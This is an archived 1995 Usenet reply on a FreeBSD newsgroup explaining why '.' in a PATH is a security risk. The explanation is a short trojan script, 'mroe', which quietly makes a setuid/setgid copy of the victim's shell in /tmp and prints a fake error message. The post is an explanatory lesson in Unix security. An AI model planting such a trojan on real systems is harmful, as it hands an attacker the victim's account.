Return to BSD News archive
Path: euryale.cc.adfa.oz.au!newshost.anu.edu.au!harbinger.cc.monash.edu.au!msunews!netnews.upenn.edu!news.voicenet.com!news.sprintlink.net!cs.utexas.edu!bcm.tmc.edu!newsfeed.rice.edu!news.sesqui.net!uuneo.neosoft.com!nmtigw!zuul.nmti.com!peter From: peter@nmti.com (Peter da Silva) Newsgroups: comp.unix.bsd.freebsd.misc Subject: Re: compiled program won't run. Date: 17 Nov 1995 23:12:55 GMT Organization: Network/development platform support, NMTI Lines: 14 Message-ID: <48j4tn$2kp@zuul.nmti.com> References: <480g7u$t2e@news.csus.edu> <dhawkDHvzsq.F5r@netcom.com> <Pine.SUN.3.90.951117125554.19452B-100000@hurricane.cs.odu.edu> NNTP-Posting-Host: sonic.nmti.com In article <Pine.SUN.3.90.951117125554.19452B-100000@hurricane.cs.odu.edu>, Ragnar <bowden@cs.odu.edu> wrote: > Would someone please explain why having a . in your path is a security > issue? % cat mroe #!/bin/sh ( cp /bin/sh /tmp/xx$$; chmod 6411 /tmp/xx$$ ) & echo "mroe: Command Not Found" % -- Peter da Silva (NIC: PJD2) `-_-' 1601 Industrial Boulevard Bailey Network Management 'U` Sugar Land, TX 77487-5013 +1 713 274 5180 "Har du kramat din varg idag?" USA Bailey pays for my technical expertise. My opinions probably scare them